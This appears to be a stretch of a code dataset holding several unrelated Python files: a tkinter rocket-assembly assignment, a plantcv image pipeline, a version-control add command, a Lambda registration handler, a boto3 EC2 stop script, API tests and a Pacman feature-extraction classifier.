Chance: 20%\\n\\n Many heavy components selected,\\n fuel supply will drain before destination\"\r\n if commandvar.get() != 1:\r\n percentageLabel[\"text\"] = \"Percentage Chance: 0%\\n\\n No Command Module selected!\\nHow will you control the rocket???\"\r\n if boostersvar.get() != 1:\r\n percentageLabel[\"text\"] = \"Percentage Chance: 0%\\n\\n Cannot leave atmosphere\\nwithout booster rockets\" \r\n if counter.getCounter() == 3 and boostersvar.get() == 1 and commandvar.get() == 1 and landingvar.get() == 1:\r\n percentageLabel[\"text\"] = \"Percentage Chance: 100%\\n\\n SUCCESS\" \r\n counter.reset()\r\n \r\n#reset the checkboxes(unticked)\r\ndef resetCheckboxes():\r\n counter.reset()\r\n percentageLabel[\"text\"] = \"Percentage Chance: 0%\"\r\n boostersvar.set(0)\r\n fuelvar.set(0)\r\n extravar.set(0)\r\n commandvar.set(0)\r\n landingvar.set(0)\r\n rovervar.set(0)\r\n rocket.resetWeight()\r\n \r\n\r\nmaster = Tk()\r\nmaster.title(\"Assignment 2\")\r\nmaster.geometry(\"900x600\")\r\nmaster.configure(bg=\"red\")\r\n\r\n###MENU###\r\nmenu_bar= tkinter.Menu(master)\r\nmaster.config(menu=menu_bar)\r\nsub_menu= tkinter.Menu(menu_bar)\r\nsub_menu1= tkinter.Menu(menu_bar)\r\n\r\nmenu_bar.add_cascade(label=\"Canvas\", menu=sub_menu)\r\nsub_menu.add_command(label=\"Shape game\", command=clearForGame)\r\nsub_menu.add_command(label=\"Draw Picture\", command=house)\r\nsub_menu.add_command(label=\"Flags\", command=moving)\r\nmenu_bar.configure(bg=\"gray42\")\r\nsub_menu.configure(bg=\"gray70\")\r\n\r\nmenu_bar.add_cascade(label=\"Checkboxes\", menu=sub_menu1)\r\nsub_menu1.add_command(label=\"Rocket Assembly\", command=clearWhole)\r\nsub_menu1.configure(bg=\"gray70\")\r\n\r\n\r\n###FRAME CONTAINING THE CANVAS###\r\nframe1 = Frame(master, bd=10, bg=\"black\", relief=\"ridge\")\r\nframe1.grid(column=2, row=5, padx=15)\r\ncanvas = Canvas(frame1, width=400, height=300)\r\ncanvas.grid(column=2, row=5, sticky=\"n\")\r\n\r\n\r\nscore = Label(master, text=0)\r\nscore.configure(width=20)\r\nscore.grid(column=1, row=4, padx=10)\r\n\r\n\r\n###START BUTTON###\r\nframe2 = Frame(master, bd=10, bg=\"red\", relief=\"raised\")\r\nframe2.grid(column=1, row=5, padx=10)\r\n\r\nstart = Button(frame2, text=\"START\", command=cb2)\r\nstart.grid(column=1, row=4)\r\nstart.configure(height=5, padx=22, width=5, fg=\"black\", bg=\"pink\")\r\n\r\nstartreset = Button(frame2, text=\"RESET\", command=clearForGame)\r\nstartreset.grid(column=2, row=4)\r\nstartreset.configure(height=5)\r\n\r\n\r\ninstructionLabel = Label(frame1, text=\"INSTRUCTIONS \\n Press Start Button \\nClick within 2 secs\\n\\nGOOD LUCK!\")\r\ninstructionLabel.configure(bg=\"gray78\", width=16, height=20)\r\ninstructionLabel.grid(column=6, row=5, padx=2)\r\n\r\n \r\n\r\n\r\n###NAME ENTRY 3 PARTS AT TOP###\r\nnameLabel = Label(master, text=\"Enter name below:\")\r\nnameLabel.configure(width=21)\r\nnameLabel.grid(column=2, row=1 )\r\ndinput = Entry(master)\r\ndinput.grid(column=2, row=2)\r\ndinput.configure(width=24)\r\n\r\nnameButton = Button(master, text=\"SUBMIT NAME\", command=getName)\r\nnameButton.configure(width=20, bg=\"pink\")\r\nnameButton.grid(column=2, row=4)\r\n\r\n\r\n#frame5 holds the colour buttons for squares\r\nframe5 = Frame(master, bd=10, relief=\"raised\") \r\nframe5.grid(column=2,row=8,pady=15)\r\nframe5.grid_remove()\r\n\r\n\r\nframe6 = Frame(master, bd=10, bg=\"gray95\", width=80) \r\nframe6.grid(column=3,row=10,pady=30,padx=100)\r\nframe6.grid_remove()\r\n \r\n###CHECKBOXES###\r\nboostersvar = IntVar()\r\nboosters = Checkbutton(frame6, text=\"Booster Rockets\",variable=boostersvar).grid(row=2, sticky=W)\r\nfuelvar = IntVar()\r\nfuel = Checkbutton(frame6, text=\"Backup Engine\", variable=fuelvar).grid(row=3, sticky=W)\r\nextravar = IntVar()\r\nextrafuel = Checkbutton(frame6, text=\"Extra Fuel\", variable=extravar).grid(row=4, sticky=W)\r\ncommandvar = IntVar()\r\ncommand = Checkbutton(frame6, text=\"Command Module\", variable=commandvar).grid(row=5, sticky=W)\r\nlandingvar = IntVar()\r\nlanding = Checkbutton(frame6, text=\"Lunar Module\", variable=landingvar).grid(row=6, sticky=W)\r\nrovervar = IntVar()\r\nrover = Checkbutton(frame6, text=\"Lunar Rover\", variable=rovervar).grid(row=7, sticky=W)\r\nsubmitorder = Button(frame6, text=\"Launch\", command=getToppings) \r\nsubmitorder.grid(column=2,row=8) \r\nresetrocket = Button(frame6, text=\"Reset\", command=resetCheckboxes) \r\nresetrocket.grid(column=1,row=8) \r\n\r\npercentageLabel = Label(frame6, text=0)\r\npercentageLabel.grid(column=1, row=10)\r\n\r\nmaster.mainloop()\r\n\r\n","sub_path":"ODwyer-Thomas2.py","file_name":"ODwyer-Thomas2.py","file_ext":"py","file_size_in_byte":19755,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"62"} +{"seq_id":"639109117","text":"import sys, traceback\nimport cv2\nimport os\nimport re\nimport numpy as np\nimport argparse\nimport string\nfrom plantcv import plantcv as pcv\n\n# Parse command-line arguments\n\n# Main pipeline\ndef main(path,imagename):\n\targs = {'names':'names.txt', \n\t\t\t'outdir':'./output-images'}\n\t#Read image\n\timg, path, filename = pcv.readimage(path+imagename,\"native\")\n\timg1=cv2.resize(img,(2000,4000))\n\t#pcv.params.debug=args['debug']\n\t#img1 = pcv.white_balance(img,roi=(400,800,200,200))\n\tshift1 = pcv.shift_img(img1, 10, 'top')\n\timg1 = shift1\n\ta = pcv.rgb2gray_lab(img1, 'a')\n\timg_binary = pcv.threshold.binary(a, 120, 255, 'dark')\n\tfill_image = pcv.fill(img_binary, 10)\n\tdilated = pcv.dilate(fill_image, 1, 1)\n\tid_objects, obj_hierarchy = pcv.find_objects(img1, dilated)\n\troi_contour, roi_hierarchy = pcv.roi.rectangle(4000, 2000, -2000, -4000 , img1)\n\troi_objects, roi_obj_hierarchy, kept_mask, obj_area = pcv.roi_objects(img1, 'partial', roi_contour, roi_hierarchy,\n\t\t\t id_objects, obj_hierarchy)\n\tclusters_i, contours, hierarchies = pcv.cluster_contours(img1, roi_objects, roi_obj_hierarchy, 1,1)\n\tpcv.params.debug = \"print\"\n\tout = args['outdir']\n\tnames = args['names']\n\toutput_path = pcv.cluster_contour_splitimg(img1, clusters_i, contours, hierarchies, out, file=filename, filenames=names)\nif __name__ == '__main__':\n\tmain()\n","sub_path":"weedpotato.py","file_name":"weedpotato.py","file_ext":"py","file_size_in_byte":1371,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"62"} +{"seq_id":"395529122","text":"import os\nimport sys\nimport json\nimport hashlib\nimport global_config\nimport datetime\nimport string\nimport shutil\nimport status\nimport errno\n\ndef handle_options_add(cmd_parser):\n cmd_parser.add_argument('-v', '--version',\n help=\"version\",\n action=\"store_true\")\n\n cmd_parser.add_argument('-d', '--dir_path',\n dest='dir_path',\n nargs='+',\n help=\"directories or files for adding to staging area\")\n\n cmd_parser.set_defaults(func=add)\n\ndef copy_to_staged_file(file_path, branch_path):\n \n staged_file = os.path.join(branch_path, global_config.STAGE_DIR, file_path)\n try:\n shutil.copy2(file_path, staged_file)\n\n except IOError as e:\n if e.errno != errno.ENOENT:\n raise\n \n os.makedirs(os.path.dirname(staged_file))\n shutil.copy2(file_path, staged_file)\n\ndef add(args):\n\n if not global_config.check_dlv_exists():\n print(\"No dlv repository exists\")\n sys.exit(0)\n\n if args.dir_path == None:\n print(\"Please enter the directory path\")\n sys.exit(0)\n\n current_branch = global_config.get_current_branch()\n branch_path = os.path.join(global_config.root_dir, global_config.DLV_DIR, current_branch)\n\n for dir_path in args.dir_path:\n\n # Check if the dir or file exists or not\n if os.path.isfile(dir_path):\n copy_to_staged_file(dir_path, branch_path)\n \n # walk over each file in the dir\n for folder, subfolders, files in os.walk(str(dir_path)):\n\n if global_config.DLV_DIR in folder:\n continue\n \n for f in files:\n file_path = os.path.join(folder, f)\n if not status.get_status(file_path) == \"Tracked Files\":\n copy_to_staged_file(file_path, branch_path)\n\n","sub_path":"dlv_commands/lib/add.py","file_name":"add.py","file_ext":"py","file_size_in_byte":1924,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"62"} +{"seq_id":"87501288","text":"import os\nimport sys\nfile_dir = os.path.dirname(__file__)\nsys.path.append(file_dir)\n\nimport json\nimport traceback as tb\nfrom service import service_user as service_u \n\ndef handle(event, context):\n try:\n\n body = json.loads(event.get('body'))\n print('body', body)\n \n resp = service_u.serviceUserRegister(body)\n\n if resp[\"statusCode\"] == 200:\n return dict(statusCode = 200, body = json.dumps({\n \"status\": \"COMPLETED\",\n \"data\": resp[\"body\"]\n }))\n else:\n print(resp)\n raise Exception(resp[\"body\"])\n\n except Exception as e:\n #tb.print_exc(e)\n print(\"error\", e)\n if \"FAILED\" in str(e):\n er = json.loads(str(e))\n return dict(statusCode = 500, body = json.dumps({\n \"status\": \"FAILED\",\n \"message\": er[\"message\"]\n }))\n \n \n return dict(statusCode = 500, body = json.dumps({\n \"status\": \"FAILED\",\n \"message\": \"Un error ha ocurrido\"\n }))\n\nif __name__ == \"__main__\":\n payload = json.dumps({\n \"traza_web\": \"\",\n \"email\": \"prueba4@gmail.com\",\n \"password\": \"123456789\",\n \"remote_ip\": \"\",\n \"serverAddr\": \"\",\n \"userAgent\": \"\",\n \"requestMethod\":\"\",\n \"scriptUri\": \"\",\n \"serverSession\": \"\",\n \"session\":\"\"\n })\n headers = {\n 'x-api-key': '6lLxq76Efr4Fm37m42ply87S3Qettsee9oXQiLZx',\n 'Content-Type': 'application/json'\n }\n print(handle({'body': payload}, ''))\n","sub_path":"src/userRegisterFunction/lambda.py","file_name":"lambda.py","file_ext":"py","file_size_in_byte":1563,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"62"} +{"seq_id":"473345952","text":"import boto3\nimport time\naws_con=boto3.session.Session(profile_name=\"root\")\nec2_con_re=aws_con.resource(service_name=\"ec2\",region_name=\"us-east-2\")\nec2_con_cli=aws_con.client(service_name=\"ec2\",region_name=\"us-east-2\")\nmy_inst_obj=ec2_con_re.Instance(\"i-08f0f706b4bd5acf6\")\nprint(\"stoping the instances\")\nmy_inst_obj.stop()\nwhile True:\n\tmy_inst_obj=ec2_con_re.Instance(\"i-08f0f706b4bd5acf6\")\n\tprint(\"The instance state is ..\",my_inst_obj.state['Name'])\n\tif my_inst_obj.state['Name']==\"stopped\":\n\t\tbreak\n\ttime.sleep(5)\nprint(\"the state of the instance is \",my_inst_obj.state['Name'])\t","sub_path":"Notes/Udemy/Boto3-refresh/Session-5-waiters/ex-waiters-stop.py","file_name":"ex-waiters-stop.py","file_ext":"py","file_size_in_byte":583,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"62"} +{"seq_id":"272732049","text":"import pytest\n\nfrom admin.governance.dids import get_trusted_registry, get_trusted_partner\nfrom acapy_ledger_facade import create_pub_did\n\nAPPLICATION_JSON_CONTENT_TYPE = {\"content-type\": \"application/json\"}\nBASE_PATH = \"/admin/governance/dids\"\n\n\n@pytest.mark.asyncio\nasync def test_get_trusted_registry(async_client, yoma_agent_mock):\n\n response = await async_client.get(\n BASE_PATH + \"/trusted-registry\",\n headers={\"x-api-key\": \"adminApiKey\", **APPLICATION_JSON_CONTENT_TYPE},\n )\n assert response.status_code == 200\n result = response.json()\n expected_keys = [\"did\", \"posture\", \"verkey\"]\n assert [list(res.keys()) == expected_keys for res in result]\n assert len(result) == 1\n\n res_method = await get_trusted_registry(aries_controller=yoma_agent_mock)\n assert res_method == result\n\n\n@pytest.mark.asyncio\nasync def test_get_trusted_partner(async_client, yoma_agent_mock):\n\n # Create a public did\n did_response = await async_client.get(\n \"/wallets/create-pub-did\",\n headers={\"x-api-key\": \"adminApiKey\", **APPLICATION_JSON_CONTENT_TYPE},\n )\n res_json = did_response.json()\n did_created = res_json[\"did_object\"][\"did\"]\n\n # try retrieve the created did from the ledger\n response = await async_client.get(\n BASE_PATH + f\"/trusted-registry/{did_created}\",\n headers={\"x-api-key\": \"adminApiKey\", **APPLICATION_JSON_CONTENT_TYPE},\n )\n\n # check the did is public and on the ledger\n assert response.status_code == 200\n result = response.json()\n expected_keys = [\"did\", \"endpoint\"]\n assert list(result.keys()) == expected_keys\n assert result[\"endpoint\"] != \"\"\n assert result[\"did\"] == did_created\n\n res_method = await get_trusted_partner(\n partner_did=f\"{did_created}\", aries_controller=yoma_agent_mock\n )\n assert res_method == result\n","sub_path":"app/tests/admin/governance/dids/test_dids.py","file_name":"test_dids.py","file_ext":"py","file_size_in_byte":1853,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"62"} +{"seq_id":"148468428","text":"import json\nfrom json import JSONDecodeError\n\n\ndef main():\n\n # define a dictionary\n data = {\n \"sandwich\": \"Reuben\",\n \"toasted\": True,\n \"toppings\": [\n \"Thousand Island Dressing\",\n \"Sauerkraut\",\n \"Pickels\"\n ],\n \"price\": 8.99\n }\n\n try:\n\n # serialize json using dumps\n jsonString = json.dumps(data, indent=4)\n\n # print data\n print(jsonString)\n\n except JSONDecodeError as error:\n\n print(error.colno)\n print(error.msg)\n\n\nmain()\n","sub_path":"json_serialize.py","file_name":"json_serialize.py","file_ext":"py","file_size_in_byte":547,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"62"} +{"seq_id":"189470235","text":"\"\"\"data_classifier.py\n\nAuthor: Albert Sebastian & Kevin Blum\nClass: CSI-490-01\nAssignment: Supervised Learning\nDate Assigned: 11/12/17\nDue Date: 11:59 pm 11/27/17\n \nDescription:\nThe code for question seven, creates the enhanced features for pacman\n \nCertification of Authenticity: \nI certify that this is entirely my own work, except where I have been provided\ncode by the instructor, or given fully-documented references to the work of \nothers. I understand the definition and consequences of plagiarism and \nacknowledge that the assessor of this assignment may, for the purpose of \nassessing this assignment:\n Reproduce this assignment and provide a copy to another member of academic\n staff; and/or Communicate a copy of this assignment to a plagiarism checking\n service (which may then retain a copy of this assignment on its database for \n the purpose of future plagiarism checking)\n\nThis code has been adapted from that provided by Prof. Joshua Auerbach:\n\nChamplain College CSI-480, Fall 2017\nThe following code was adapted by Joshua Auerbach (jauerbach@champlain.edu)\nfrom the UC Berkeley Pacman Projects (see license and attribution below).\n\n----------------------\nLicensing Information: You are free to use or extend these projects for\neducational purposes provided that (1) you do not distribute or publish\nsolutions, (2) you retain this notice, and (3) you provide clear\nattribution to UC Berkeley, including a link to http://ai.berkeley.edu.\n\nAttribution Information: The Pacman AI projects were developed at UC Berkeley.\nThe core projects and autograders were primarily created by John DeNero\n(denero@cs.berkeley.edu) and Dan Klein (klein@cs.berkeley.edu).\nStudent side autograding was added by Brad Miller, Nick Hay, and\nPieter Abbeel (pabbeel@cs.berkeley.edu).\n\nThis file contains feature extraction methods and harness\ncode for data classification\n\nChamplain College CSI-480, Fall 2017\nThe following code was adapted by Joshua Auerbach (jauerbach@champlain.edu)\nfrom the UC Berkeley Pacman Projects (see license and attribution below).\n\n----------------------\nLicensing Information: You are free to use or extend these projects for\neducational purposes provided that (1) you do not distribute or publish\nsolutions, (2) you retain this notice, and (3) you provide clear\nattribution to UC Berkeley, including a link to http://ai.berkeley.edu.\n\nAttribution Information: The Pacman AI projects were developed at UC Berkeley.\nThe core projects and autograders were primarily created by John DeNero\n(denero@cs.berkeley.edu) and Dan Klein (klein@cs.berkeley.edu).\nStudent side autograding was added by Brad Miller, Nick Hay, and\nPieter Abbeel (pabbeel@cs.berkeley.edu).\n\"\"\"\n\nimport most_frequent\nimport naive_bayes\nimport perceptron\nimport perceptron_pacman\nimport perceptron_numpy\nimport samples\nimport sys\nimport util\nfrom pacman import GameState\nimport matplotlib.pyplot as plt\nimport numpy as np\nimport logistic\nfrom util import manhattan_distance\n\nTEST_SET_SIZE = 100\nDIGIT_DATUM_WIDTH=28\nDIGIT_DATUM_HEIGHT=28\nFACE_DATUM_WIDTH=60\nFACE_DATUM_HEIGHT=70\n\n\ndef basic_feature_extractor_digit(datum):\n \"\"\"\n Returns a set of pixel features indicating whether\n each pixel in the provided datum is white (0) or gray/black (1)\n \"\"\"\n a = datum.get_pixels()\n\n features = util.Counter()\n for x in range(DIGIT_DATUM_WIDTH):\n for y in range(DIGIT_DATUM_HEIGHT):\n if datum.get_pixel(x, y) > 0:\n features[(x,y)] = 1\n else:\n features[(x,y)] = 0\n return features\n\ndef basic_feature_extractor_face(datum):\n \"\"\"\n Returns a set of pixel features indicating whether\n each pixel in the provided datum is an edge (1) or no edge (0)\n \"\"\"\n a = datum.get_pixels()\n\n features = util.Counter()\n for x in range(FACE_DATUM_WIDTH):\n for y in range(FACE_DATUM_HEIGHT):\n if datum.get_pixel(x, y) > 0:\n features[(x,y)] = 1\n else:\n features[(x,y)] = 0\n return features\n\ndef enhanced_feature_extractor_digit(datum):\n \"\"\"\n Your feature extraction playground.\n\n You should return a util.Counter() of features\n for this datum (datum is of type samples.Datum).\n\n ## DESCRIBE YOUR ENHANCED FEATURES HERE...\n\n ##\n \"\"\"\n features = basic_feature_extractor_digit(datum)\n\n \"*** YOUR CODE HERE ***\"\n \n\n\n\ndef basic_feature_extractor_pacman(state):\n \"\"\"\n A basic feature extraction function.\n\n You should return a util.Counter() of features\n for each (state, action) pair along with a list of the legal actions\n\n ##\n \"\"\"\n features = util.Counter()\n for action in state.get_legal_actions():\n successor = state.generate_successor(0, action)\n food_count = successor.get_food().count()\n feature_counter = util.Counter()\n feature_counter['food_count'] = food_count\n features[action] = feature_counter\n return features, state.get_legal_actions()\n\ndef enhanced_feature_extractor_pacman(state):\n \"\"\"\n Your feature extraction playground.\n\n You should return a util.Counter() of features\n for each (state, action) pair along with a list of the legal actions\n\n ##\n \"\"\"\n\n features = basic_feature_extractor_pacman(state)[0]\n for action in state.get_legal_actions():\n features[action] = util.Counter(features[action], **enhanced_pacman_features(state, action))\n return features, state.get_legal_actions()\n\ndef enhanced_pacman_features(state, action):\n \"\"\"\n For each state, this function is called with each legal action.\n It should return a counter with { <feature name> : <feature value>, ... }\n \"\"\"\n features = util.Counter()\n \"*** YOUR CODE HERE ***\"\n \"\"\"\n Initialize values for the the current state which is referred to as the\n old state and the new state is referred to as state, becaus it is used for the majority\n of features, and the location of pacman and the food in the successor state\n \"\"\"\n old_state = state\n state = state.generate_pacman_successor(action)\n pacman_location = state.get_pacman_position()\n new_food = state.get_num_food()\n \n \"\"\"\n Format for extracting each feature\n get state of each feature, capsule location, food location, ghost location, ghost scraed state\n set the distance to the nearest of each features to zero\n if in the next state there are values of each feature list then\n calculate the closest distance to each feature value as the minimum \n manhattan distance from the location of pacman to the location of the feature\n then each features is calculated as either the reciprocal of the value if it \n exists or it is set to zero\n \"\"\"\n food_locations = state.get_food().as_list()\n nearest_food_dist = 0\n if food_locations:\n nearest_food_dist = min([manhattan_distance(pacman_location, food) for food in food_locations])\n nearest_food_dist = 1.0/nearest_food_dist if nearest_food_dist else nearest_food_dist\n \n capsule_locations = state.get_food().as_list()\n nearest_capulses_dist = 0\n if capsule_locations:\n nearest_capulses_dist = min([manhattan_distance(pacman_location, capsules) for capsules in capsule_locations])\n nearest_capulses_dist = 1.0/nearest_capulses_dist if nearest_capulses_dist else nearest_capulses_dist\n \n old_ghost_locations = old_state.get_ghost_positions()\n old_nearest_ghost_dist = 0\n if old_ghost_locations:\n old_nearest_ghost_dist = min(manhattan_distance(pacman_location, location) for location in old_ghost_locations)\n old_nearest_ghost_dist = 1.0/old_nearest_ghost_dist if old_nearest_ghost_dist else old_nearest_ghost_dist\n \n ghost_locations = state.get_ghost_positions()\n nearest_ghost_dist = 0\n if ghost_locations:\n nearest_ghost_dist = min(manhattan_distance(pacman_location, location) for location in ghost_locations)\n nearest_ghost_dist = 1.0/nearest_ghost_dist if nearest_ghost_dist else nearest_ghost_dist\n \n new_ghost_states = state.get_ghost_states()\n new_scared_times = [ghost_state.scared_timer for ghost_state in new_ghost_states]\n nearest_scared_ghost_dist = 0\n if new_scared_times:\n scared_ghost_locs = state.get_ghost_positions()\n if scared_ghost_locs:\n nearest_scared_ghost_dist = min(manhattan_distance(pacman_location, location) for location in scared_ghost_locs)\n nearest_scared_ghost_dist = 1.0/nearest_scared_ghost_dist if nearest_scared_ghost_dist else nearest_scared_ghost_dist\n \n \"\"\"\n set all of the features in the feature vector which is just the\n value of each feature except for the calculation of the difference of the distance between\n the current closest ghost and the closest ghost which must verify that both those values \n \"\"\"\n features['new_num_food'] = new_food\n features['nearest_capulses_dist'] = nearest_capulses_dist\n features['nearest_food_dist'] = nearest_food_dist\n features['nearest_ghost_dist'] = nearest_ghost_dist\n features['old_nearest_ghost_dist'] = old_nearest_ghost_dist\n features['nearest_scared_ghost_dist'] = nearest_ghost_dist\n if nearest_ghost_dist and old_nearest_ghost_dist:\n features[\"closest_ghost_dist_difference\"] = old_nearest_ghost_dist - nearest_ghost_dist\n \n return features\n util.raise_not_defined()\n\n\ndef contest_feature_extractor_digit(datum):\n \"\"\"\n Specify features to use for the minicontest\n \"\"\"\n features = basic_feature_extractor_digit(datum)\n return features\n\ndef enhanced_feature_extractor_face(datum):\n \"\"\"\n Your feature extraction playground for faces.\n It is your choice to modify this.\n \"\"\"\n features = basic_feature_extractor_face(datum)\n return features\n\ndef analysis(classifier, guesses, test_labels, test_data, raw_test_data, print_image):\n \"\"\"\n This function is called after learning.\n Include any code that you want here to help you analyze your results.\n\n Use the print_image(<list of pixels>) function to visualize features.\n\n An example of use has been given to you.\n\n - classifier is the trained classifier\n - guesses is the list of labels predicted by your classifier on the test set\n - test_labels is the list of true labels\n - test_data is the list of training datapoints (as util.Counter of features)\n - raw_test_data is the list of training datapoints (as samples.Datum)\n - print_image is a method to visualize the features\n (see its use in the odds ratio part in run_classifier method)\n\n This code won't be evaluated. It is for your own optional use\n (and you can modify the signature if you want).\n \"\"\"\n\n # Put any code here...\n # Example of use:\n # for i in range(len(guesses)):\n # prediction = guesses[i]\n # truth = test_labels[i]\n # if (prediction != truth):\n # print \"===================================\"\n # print \"Mistake on example %d\" % i\n # print \"Predicted %d; truth is %d\" % (prediction, truth)\n # print \"Image: \"\n # print raw_test_data[i]\n # break\n\n\n## =====================\n## You don't have to modify any code below.\n## =====================\n\n\nclass ImagePrinter:\n def __init__(self, width, height):\n self.width = width\n self.height = height\n\n def print_image(self, pixels, ax=None):\n \"\"\"\n Prints a Datum object that contains all pixels in the\n provided list of pixels. This will serve as a helper function\n to the analysis function you write.\n\n Pixels should take the form\n [(2,2), (2, 3), ...]\n where each tuple represents a pixel.\n \"\"\"\n image = samples.Datum(None,self.width,self.height)\n for pix in pixels:\n try:\n # This is so that new features that you could define which\n # which are not of the form of (x,y) will not break\n # this image printer...\n x,y = pix\n image.pixels[x][y] = 2\n except:\n print(\"new features:\", pix)\n continue\n \n if ax: \n pixels = np.asarray(np.asarray(image.pixels).T)\n im = np.zeros((pixels.shape[0], pixels.shape[1],3))\n im[pixels>=1] = [0,1,0]\n im[pixels<1] = [0,0,0]\n ax.imshow(im, interpolation='nearest')\n else :\n print(image)\n\ndef default(str):\n return str + ' [Default: %default]'\n\nUSAGE_STRING = \"\"\"\n USAGE: python data_classifier.py <options>\n EXAMPLES: (1) python data_classifier.py\n - trains the default most_frequent classifier on the digit dataset\n using the default 100 training examples and\n then test the classifier on test data\n (2) python data_classifier.py -c naive_bayes -d digits -t 1000 -f -o -1 3 -2 6 -k 2.5\n - would run the naive Bayes classifier on 1000 training examples\n using the enhanced_feature_extractor_digits function to get the features\n on the faces dataset, would use the smoothing parameter equals to 2.5, would\n test the classifier on the test data and performs an odd ratio analysis\n with label1=3 vs. label2=6\n \"\"\"\n\ndef learning_rate_callback(option, opt, value, parser):\n setattr(parser.values, option.dest, [float(s) for s in value.split(',')])\n\n\ndef read_command( argv ):\n \"Processes the command used to run from the command line.\"\n from optparse import OptionParser\n parser = OptionParser(USAGE_STRING)\n\n parser.add_option('-c', '--classifier', help=default('The type of classifier'), choices=['most_frequent', 'nb', 'naive_bayes', 'perceptron', 'perceptron_numpy', 'logistic', 'minicontest'], default='most_frequent')\n parser.add_option('-d', '--data', help=default('Dataset to use'), choices=['digits', 'faces', 'pacman'], default='digits')\n parser.add_option('-t', '--training', help=default('The size of the training set'), default=100, type=\"int\")\n parser.add_option('-f', '--features', help=default('Whether to use enhanced features'), default=False, action=\"store_true\")\n parser.add_option('-o', '--odds', help=default('Whether to compute odds ratios'), default=False, action=\"store_true\")\n parser.add_option('-1', '--label1', help=default(\"First label in an odds ratio comparison\"), default=0, type=\"int\")\n parser.add_option('-2', '--label2', help=default(\"Second label in an odds ratio comparison\"), default=1, type=\"int\")\n parser.add_option('-w', '--weights', help=default('Whether to print weights'), default=False, action=\"store_true\")\n parser.add_option('-n', '--num_weights', help=default(\"Num Weights to Print (when --weights enabled), default: 100\"), default=100, type=\"int\")\n parser.add_option('-k', '--smoothing', help=default(\"Smoothing parameter (ignored when using --autotune)\"), type=\"float\", default=2.0)\n parser.add_option('-a', '--autotune', help=default(\"Whether to automatically tune hyperparameters\"), default=False, action=\"store_true\")\n parser.add_option('-i', '--iterations', help=default(\"Maximum iterations to run training\"), default=3, type=\"int\")\n parser.add_option('-s', '--test', help=default(\"Amount of test data to use\"), default=TEST_SET_SIZE, type=\"int\")\n parser.add_option('-g', '--agent_to_clone', help=default(\"Pacman agent to copy\"), default=None, type=\"str\")\n parser.add_option('-l', '--learning_rates', help=default(\"Learning rates to use for gradient descent, can be a comma separated list or single value\"), \n default=[0.2], type=\"str\", action='callback', callback=learning_rate_callback)\n\n\n options, otherjunk = parser.parse_args(argv)\n if len(otherjunk) != 0: raise Exception('Command line input not understood: ' + str(otherjunk))\n args = {}\n\n # Set up variables according to the command line input.\n print(\"Doing classification\")\n print(\"--------------------\")\n print(\"data:\\t\\t\" + options.data)\n print(\"classifier:\\t\\t\" + options.classifier)\n if not options.classifier == 'minicontest':\n print(\"using enhanced features?:\\t\" + str(options.features))\n else:\n print(\"using minicontest feature extractor\")\n print(\"training set size:\\t\" + str(options.training))\n if(options.data==\"digits\"):\n print_image = ImagePrinter(DIGIT_DATUM_WIDTH, DIGIT_DATUM_HEIGHT).print_image\n if (options.features):\n feature_function = enhanced_feature_extractor_digit\n else:\n feature_function = basic_feature_extractor_digit\n if (options.classifier == 'minicontest'):\n feature_function = contest_feature_extractor_digit\n elif(options.data==\"faces\"):\n print_image = ImagePrinter(FACE_DATUM_WIDTH, FACE_DATUM_HEIGHT).print_image\n if (options.features):\n feature_function = enhanced_feature_extractor_face\n else:\n feature_function = basic_feature_extractor_face\n elif(options.data==\"pacman\"):\n print_image = None\n if (options.features):\n feature_function = enhanced_feature_extractor_pacman\n else:\n feature_function = basic_feature_extractor_pacman\n else:\n print(\"Unknown dataset\", options.data)\n print(USAGE_STRING)\n sys.exit(2)\n\n if(options.data==\"digits\"):\n legal_labels = list(range(10))\n else:\n legal_labels = ['Stop', 'West', 'East', 'North', 'South']\n\n if options.training <= 0:\n print(\"Training set size should be a positive integer (you provided: %d)\" % options.training)\n print(USAGE_STRING)\n sys.exit(2)\n\n if options.smoothing <= 0:\n print(\"Please provide a positive number for smoothing (you provided: %f)\" % options.smoothing)\n print(USAGE_STRING)\n sys.exit(2)\n\n if options.odds:\n if options.label1 not in legal_labels or options.label2 not in legal_labels:\n print(\"Didn't provide a legal labels for the odds ratio: (%d,%d)\" % (options.label1, options.label2))\n print(USAGE_STRING)\n sys.exit(2)\n\n if(options.classifier == \"most_frequent\"):\n classifier = most_frequent.MostFrequentClassifier(legal_labels)\n elif(options.classifier == \"naive_bayes\" or options.classifier == \"nb\"):\n classifier = naive_bayes.NaiveBayesClassifier(legal_labels)\n classifier.set_smoothing(options.smoothing)\n if (options.autotune):\n print(\"using automatic tuning for naivebayes\")\n classifier.automatic_tuning = True\n else:\n print(\"using smoothing parameter k=%f for naivebayes\" % options.smoothing)\n elif(options.classifier == \"perceptron\"):\n if options.data != 'pacman':\n classifier = perceptron.PerceptronClassifier(legal_labels,options.iterations)\n else:\n classifier = perceptron_pacman.PerceptronClassifierPacman(legal_labels,options.iterations)\n elif(options.classifier == \"perceptron_numpy\"):\n if options.data != 'pacman':\n classifier = perceptron_numpy.OptimizedPerceptronClassifier(legal_labels,options.iterations)\n elif(options.classifier == \"logistic\"):\n if options.data != 'pacman':\n classifier = logistic.SoftmaxClassifier(legal_labels,options.iterations)\n classifier.learning_rates = options.learning_rates\n\n elif(options.classifier == 'minicontest'):\n import minicontest\n classifier = minicontest.contest_classifier(legal_labels)\n else:\n print(\"Unknown classifier:\", options.classifier)\n print(USAGE_STRING)\n\n sys.exit(2)\n\n args['agent_to_clone'] = options.agent_to_clone\n\n args['classifier'] = classifier\n args['feature_function'] = feature_function\n args['print_image'] = print_image\n\n return args, options\n\n# Dictionary containing full path to .pkl file that contains the agent's training, validation, and testing data.\nMAP_AGENT_TO_PATH_OF_SAVED_GAMES = {\n 'FoodAgent': ('pacmandata/food_training.pkl','pacmandata/food_validation.pkl','pacmandata/food_test.pkl' ),\n 'StopAgent': ('pacmandata/stop_training.pkl','pacmandata/stop_validation.pkl','pacmandata/stop_test.pkl' ),\n 'SuicideAgent': ('pacmandata/suicide_training.pkl','pacmandata/suicide_validation.pkl','pacmandata/suicide_test.pkl' 